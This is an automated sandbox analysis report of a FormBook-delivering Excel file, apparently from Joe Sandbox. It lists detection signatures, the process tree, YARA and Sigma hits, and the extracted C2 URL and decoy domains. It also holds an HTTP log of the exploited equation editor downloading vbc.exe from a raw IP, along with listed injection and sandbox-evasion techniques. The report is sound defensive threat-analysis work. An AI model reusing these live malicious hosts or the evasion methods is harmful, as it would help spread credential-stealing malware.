Windows Analysis Report Swift.xlsx

Overview

General Information

Sample Name: Swift.xlsx
Analysis ID: 502159
MD5: 9a43d5d2ffc56e823280ca84f6bb870f
SHA1: f0945075b44bc2cb2c96b168d47a269eb0d714ce
SHA256: 88c07a30074065b292335ae5d4a45f905fa8a6739d3031d2f8236d2d9a27c681
Tags: Formbook, VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Contains functionality to detect sleep reduction / modifications
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Potential document exploit detected (performs DNS queries)
Contains functionality to record screenshots
PE file contains executable resources (Code or Archives)
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Drops PE files to the user directory
Contains functionality to detect sandboxes (mouse cursor move detection)
May check if the current machine is a sandbox (GetTickCount - Sleep)
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2068 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1188 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2564 cmdline: 'C:\Users\Public\vbc.exe' MD5: A65B1815177EF9EBA7E5E894BBF65A3C)
      • DpiScaling.exe (PID: 1464 cmdline: C:\Windows\System32\DpiScaling.exe MD5: 8C9DA2E414E713D3DAFF1F18223AE11B)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • Zxsdvph.exe (PID: 2680 cmdline: 'C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe' MD5: A65B1815177EF9EBA7E5E894BBF65A3C)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.septemberstockevent200.com/ht08/"], "decoy": ["joye.club", "istanbulemlakgalerisi.online", "annikadaniel.love", "oooci.com", "curebase-test.com", "swisstradecenter.com", "hacticum.com", "centercodebase.com", "recbi56ni.com", "mmj0115.xyz", "sharpstead.com", "sprklbeauty.com", "progettogenesi.cloud", "dolinum.com", "amaroqadvisors.com", "traininig.com", "leewaysvcs.com", "nashhomesearch.com", "joy1263.com", "serkanyamac.com", "nursingprogramsforme.com", "huakf.com", "1w3.online", "watermountsteam.top", "tyralruutan.quest", "mattlambert.xyz", "xn--fiqs8sypgfujbl4a.xn--czru2d", "hfgoal.com", "587868.net", "noyoucantridemyonewheel.com", "riewesell.top", "expn.asia", "suplementarsas.com", "item154655544.com", "cdgdentists.com", "deboraverdian.com", "franquiciasexclusivas.tienda", "tminus-10.com", "psychoterapeuta-wroclaw.com", "coachingbywatson.com", "lknitti.net", "belenpison.agency", "facilitetec.com", "99077000.com", "thefitmog.com", "kinmanpowerwashing.com", "escueladelbuenamor.com", "getjoyce.net", "oilelm.com", "maikoufarm.com", "hespresso.net", "timothyschmallrealt.com", "knoxvilleraingutters.com", "roonkingagency.online", "trashwasher.com", "angyfoods.com", "yungbredda.com", "digipoint-entertainment.com", "shangduli.space", "kalaraskincare.com", "ktnsound.xyz", "miabellavita.com", "thenlpmentor.com", "marzhukov.com"]}

Yara Overview

Dropped Files

Source: C:\Users\Public\Libraries\hpvdsxZ.url, Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Author: @itsreallynick (Nick Carr), Strings:
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
    Source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com, Strings:
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    Source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group, Strings:
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    Source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
      Source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com, Strings:
      • 0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Sigma Overview

      Exploits:

      Sigma detected: EQNEDT32.EXE connecting to internet
      Source: Network Connection, Author: Joe Security, Data: DestinationIp: 192.3.222.155, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1188, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
      Sigma detected: File Dropped By EQNEDT32EXE
      Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1188, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

      System Summary:

      Sigma detected: Droppers Exploiting CVE-2017-11882
      Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1188, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2564
      Sigma detected: Execution from Suspicious Folder
      Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1188, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2564

      Jbx Signature Overview

      AV Detection:

      Found malware configuration
      Source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Malware Configuration Extractor: FormBook
      Yara detected FormBook
      Source: Yara match, File source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match, File source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000007.00000000.633264807.0000000072480000.00000040.00000001.sdmp, type: MEMORY
      Source: 7.0.DpiScaling.exe.72480000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
      Source: 7.2.DpiScaling.exe.72480000.5.unpack, Avira: Label: TR/Crypt.ZPACK.Gen

      Exploits:

      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe
      Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: wntdll.pdb source: DpiScaling.exe
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe, Code function: 9_2_00409218 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe, Code function: 9_2_00405AA4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn
      Source: global traffic, DNS query: name: onedrive.live.com
      Source: C:\Windows\SysWOW64\DpiScaling.exe, Code function: 4x nop then pop ebx (7_2_72486ABE)
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe, Code function: 4x nop then mov eax, dword ptr [ebp-10h] (9_2_0049D80C)
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe, Code function: 4x nop then xor eax, eax (9_2_0049FB94)
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe, Code function: 4x nop then mov edx, eax (9_2_0049DED8)
      Source: global traffic, TCP traffic: 192.168.2.22:49167 -> 192.3.222.155:80

      Networking:

      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractor, URLs: www.septemberstockevent200.com/ht08/
      Source: Joe Sandbox View, ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
      Source: global traffic, HTTP traffic detected:
        HTTP/1.1 200 OK
        Date: Wed, 13 Oct 2021 15:05:26 GMT
        Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
        Last-Modified: Wed, 13 Oct 2021 09:47:27 GMT
        ETag: "f7c00-5ce38d98ee1b4"
        Accept-Ranges: bytes
        Content-Length: 1014784
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: application/x-msdownload
      Source: global traffic, HTTP traffic detected:
        GET /008008/vbc.exe HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: 192.3.222.155
        Connection: Keep-Alive
      Source: unknown, TCP traffic detected without corresponding DNS query: 192.3.222.155
      Source: explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmp, String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: DpiScaling.exe, 00000007.00000002.702517793.0000000002000000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.658976324.0000000004650000.00000002.00020000.sdmp, String found in binary or memory: http://computername/printers/printername/.printer
      Source: explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmp, String found in binary or memory: http://investor.msn.com
      Source: explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmp, String found in binary or memory: http://investor.msn.com/
      Source: explorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmp, String found in binary or memory: http://java.sun.com
      Source: explorer.exe, 00000008.00000000.666365294.0000000008427000.00000004.00000001.sdmp, String found in binary or memory: http://java.w
      Source: explorer.exe, 00000008.00000002.696339073.0000000002CC7000.00000002.00020000.sdmp, String found in binary or memory: http://localizability/practices/XML.asp
      Source: explorer.exe, 00000008.00000002.696339073.0000000002CC7000.00000002.00020000.sdmp, String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: explorer.exe, 00000008.00000000.637889890.0000000001BE0000.00000002.00020000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: explorer.exe, 00000008.00000000.687535121.0000000003E50000.00000002.00020000.sdmp, String found in binary or memory: http://servername/isapibackend.dll
      Source: explorer.exe, 00000008.00000002.696339073.0000000002CC7000.00000002.00020000.sdmp, String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: DpiScaling.exe, 00000007.00000002.702517793.0000000002000000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.658976324.0000000004650000.00000002.00020000.sdmp, String found in binary or memory: http://treyresearch.net
      Source: DpiScaling.exe, 00000007.00000002.702517793.0000000002000000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.658976324.0000000004650000.00000002.00020000.sdmp, String found in binary or memory: http://wellformedweb.org/CommentAPI/
      Source: explorer.exe, 00000008.00000002.696339073.0000000002CC7000.00000002.00020000.sdmp, String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: explorer.exe, 00000008.00000000.637889890.0000000001BE0000.00000002.00020000.sdmp, String found in binary or memory: http://www.%s.comPA
      Source: explorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmp, String found in binary or memory: http://www.autoitscript.com/autoit3
      Source: DpiScaling.exe, 00000007.00000002.702517793.0000000002000000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.658976324.0000000004650000.00000002.00020000.sdmp, String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
      Source: explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmp, String found in binary or memory: http://www.hotmail.com/oe
      Source: explorer.exe, 00000008.00000002.696339073.0000000002CC7000.00000002.00020000.sdmp, String found in binary or memory: http://www.icra.org/vocabulary/.
      Source: explorer.exe, 00000008.00000000.658976324.0000000004650000.00000002.00020000.sdmp, String found in binary or memory: http://www.iis.fhg.de/audioPA
      Source: explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmp, String found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: explorer.exe, 00000008.00000000.666365294.0000000008427000.00000004.00000001.sdmp, String found in binary or memory: http://www.piriform.com/ccleaner
      Source: explorer.exe, 00000008.00000000.666365294.0000000008427000.00000004.00000001.sdmp, String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
      Source: explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmp, String found in binary or memory: http://www.windows.com/pctv.
      Source: explorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmp, String found in binary or memory: https://support.mozilla.org
      Source: explorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmp, String found in binary or memory: https://www.mozilla.org
      Source: explorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmp, String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BA1488DD.emf
      Source: unknown, DNS traffic detected: queries for: onedrive.live.com
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe, Code function: 9_2_0042C3D4 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe, Code function: 9_2_0042CA18 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe, Code function: 9_2_00448008 GetKeyboardState
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe, Code function: 9_2_0043F6B0 OpenClipboard,GlobalAlloc,GlobalFix,EmptyClipboard,SetClipboardData,GlobalUnWire

      E-Banking Fraud:

      Yara detected FormBook
      Source: Yara match, File source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match, File source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match, File source: 00000007.00000000.633264807.0000000072480000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      Malicious sample detected (through community Yara rule)
      Source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      Source: 00000007.00000000.633264807.0000000072480000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      Office equation editor drops PE file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\Public\vbc.exe
      Source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000007.00000000.633264807.0000000072480000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: C:\Users\Public\Libraries\hpvdsxZ.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_72498690 NtReadFile,7_2_72498690
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_72498710 NtClose,7_2_72498710
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_724987C0 NtAllocateVirtualMemory,7_2_724987C0
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_724985E0 NtCreateFile,7_2_724985E0
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_724987C2 NtAllocateVirtualMemory,7_2_724987C2
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_02590048 NtProtectVirtualMemory,LdrInitializeThunk,7_2_02590048
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025900C4 NtCreateFile,LdrInitializeThunk,7_2_025900C4
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025907AC NtCreateMutant,LdrInitializeThunk,7_2_025907AC
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_0258FAD0
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_0258FAE8
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_0258FB68
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FBB8 NtQueryInformationToken,LdrInitializeThunk,7_2_0258FBB8
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258F9F0 NtClose,LdrInitializeThunk,7_2_0258F9F0
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_0258FED0
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FFB4 NtCreateSection,LdrInitializeThunk,7_2_0258FFB4
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FC60 NtMapViewOfSection,LdrInitializeThunk,7_2_0258FC60
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_0258FDC0
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_02590078 NtResumeThread,7_2_02590078
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_02590060 NtQuerySection,7_2_02590060
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025910D0 NtOpenProcessToken,7_2_025910D0
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_02591148 NtOpenThread,7_2_02591148
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0259010C NtOpenDirectoryObject,7_2_0259010C
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025901D4 NtSetValueKey,7_2_025901D4
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FA50 NtEnumerateValueKey,7_2_0258FA50
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FA20 NtQueryInformationFile,7_2_0258FA20
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FAB8 NtQueryValueKey,7_2_0258FAB8
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FB50 NtCreateKey,7_2_0258FB50
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FBE8 NtQueryVirtualMemory,7_2_0258FBE8
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258F8CC NtWaitForSingleObject,7_2_0258F8CC
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258F900 NtReadFile,7_2_0258F900
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258F938 NtWriteFile,7_2_0258F938
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_02591930 NtSetContextThread,7_2_02591930
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FE24 NtWriteVirtualMemory,7_2_0258FE24
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FEA0 NtReadVirtualMemory,7_2_0258FEA0
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FF34 NtQueueApcThread,7_2_0258FF34
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FFFC NtCreateProcessEx,7_2_0258FFFC
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FC48 NtSetInformationFile,7_2_0258FC48
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_02590C40 NtGetContextThread,7_2_02590C40
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FC30 NtOpenProcess,7_2_0258FC30
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FC90 NtUnmapViewOfSection,7_2_0258FC90
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_00466610 NtdllDefWindowProc_A,9_2_00466610
